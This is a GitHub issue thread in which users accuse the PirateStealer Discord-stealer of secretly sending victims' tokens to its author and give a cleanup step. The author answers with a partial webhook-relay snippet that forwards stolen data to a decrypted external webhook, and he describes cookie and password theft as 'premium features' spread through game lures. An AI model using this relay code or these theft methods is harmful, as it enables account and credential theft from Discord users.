### ISSUE TITLE
Message to anyone that is using this or has used this.

### ISSUE THREAD

**Issue by DiscordBotTester** [Stanley-GF/PirateStealer#6]
Thanks to qoft for this copypasta

Pirate stealer (https://github.com/Stanley-GF/PirateStealer) is DUAL HOOKED 

If you have ran pirate stealer, got to C:\Users\YOUR PC NAME\AppData\Local\Discord\app-1.0.9003\modules\discord_desktop_core-1\discord_desktop_core and replace the everything in index.js with module.exports = require('./core.asar');,

dual hooked as in they get the tokens too
not just you
story:

my friends were messing around with pirate stealer, we were seeing it if it actually worked and then yeah, one of the admins & stanly himself had access to the account bc they were talking on it. then account went offline, (probable changed pass so stanly can give the account back) and then the person on the account started being nice and gave the account back, as in before the person on the account was being like "fuck you skid" and shit like that

https://cdn.discordapp.com/attachments/919250472689360896/919356383260975184/2021-12-11_17-25-18.mp4 proof to support evidence

**Comment by Stanley-GF** [comment]
uh

**Comment by Stanley-GF** [comment]
its opensrc bro

**Comment by Stanley-GF** [comment]
and what is qoft ? Its like hackernews ?

**Comment by Stanley-GF** [comment]
```js
app.post('/webhook/:iv/:content', (req, res) => {
    if (JSON.stringify(req.body).match(/*no*/) && /*not gonna leak the filter :')*/){
        var uncrypted_hook = decrypt({iv:req.params.iv, content:req.params.content})

        console.log(uncrypted_hook)
        axios
  .post(uncrypted_hook, req.body)
  .then(resp => {
    return res.status(201)

    })
  .catch(error => {
    console.error(error)
  })

    }else{ 
        return res.send('no.').status(400);
    }
})

```
yo so dumb

**Comment by Stanley-GF** [comment]
skid.

**Comment by Stanley-GF** [comment]
Ah and btw if you're talking bout this Yonix kid, I told him to give back.

**Comment by Qoft** [comment]
open source and the builder can be completly different

**Comment by Stanley-GF** [comment]
not really. There no dualhook, you are just fucking unable to understand how an api works

**Comment by TrojanLij** [comment]
So it **MAY NOT** be dual hooked... but there is **A LOT MORE** in the background than you @Stanley-GF are letting on. you claim that the PS steals discord client information (CC/CVC, emails, passwords, etc...) and that is the open source injector you have [HERE](https://github.com/Stanley-GF/PirateStealer/blob/main/src/injection/injection-clean.js). But are you hiding the fact that it steals other data as well (passwords from cached websites, passwords in cookies, etc) and saves them in a sql and text file that updates regularly upon updating the information?

![image](https://user-images.githubusercontent.com/6537506/147163407-3f3b9bbe-2275-47a7-886f-960eb41014f8.png)
![image](https://user-images.githubusercontent.com/6537506/147163448-e9eb76f5-8b76-4c52-8254-af6c629c0acb.png)

Oh... forgot to mention that these files are visible in your YouTube videos!
![image](https://user-images.githubusercontent.com/6537506/147163791-207ee66a-e02a-46de-81cc-98c0140c2e3c.png)
I'm guessing that is just a test (guessing based off of the path `C:\Users\hunol\` and you crediting `Hunolog` but that does not matter as there is **MUCH MORE** you aren't telling the users of your malware.

This isn't a one time finding either. in the past 8 or 9 (not totally sure about how many as I have seen quite a few already) PirateStealer malware samples, (**this including the obfuscated ones**) have had this same feature / process being executed **BEFORE** injection within discord even happens. so again ill give you the shadow of a doubt about the whole dual-hook part. but there is defiantly some additional harvesting and shady business going on.

oh and yeah just because you claim your discord injector is open source, your builder isn't so we have no idea what else is happening in the back. so @Qoft hit it on the nail with that comment.

~*Trojan*

**Comment by Stanley-GF** [comment]
fuck piratestealer, I should never have made it public but now its done.

btw, even if the builder is not opensource, the injected code (if you put obfuscate: false) will be the same and if you debug the request you can see that the only webhook where its posting requests is your.
if peoples are not happy with a semi-opensource builder, they just don't have to use PirateStealer i don't really care cuz im winning 0 from them.
PirateStealer prob is the most used/edited malware of Discord (prob, not sure) if you receive a message about a game your 99% sure that its piratestealer
about cookies, passwords, etc, this is premium features 😳 

If I wanted to dualhook PirateStealer, I wouldn't just infect people who use the web builder, that's stupid. I could infect a bigger community, knowing that i never made video about how to build PirateStealer. 

Discord malware "community" (guys that using malwares, raid tool and all these shits) are all literally dumb. If you make free thing from 1yr and then for unknown reason it stop working, they'll dm u saying "yo bro fix this please" then they'll spam you. But if its working nice for them, they'll never dm u for say "gg" so, (im not dualhooking PirateStealer) but i understand guys that do Dualhooked token grabbed

~ *Stanley*

**Comment by DiscordBotTester** [comment]
guys id never rat my stealer and dualhook it you gotta trust me bro id never do such a thing im just a kid

https://media.discordapp.net/attachments/870980108217888808/923372615689703474/a321f2b0-3f74-11ec-9ae9-7116f8aad3b0_1200_630.png

**Comment by Stanley-GF** [comment]
Not telling that.
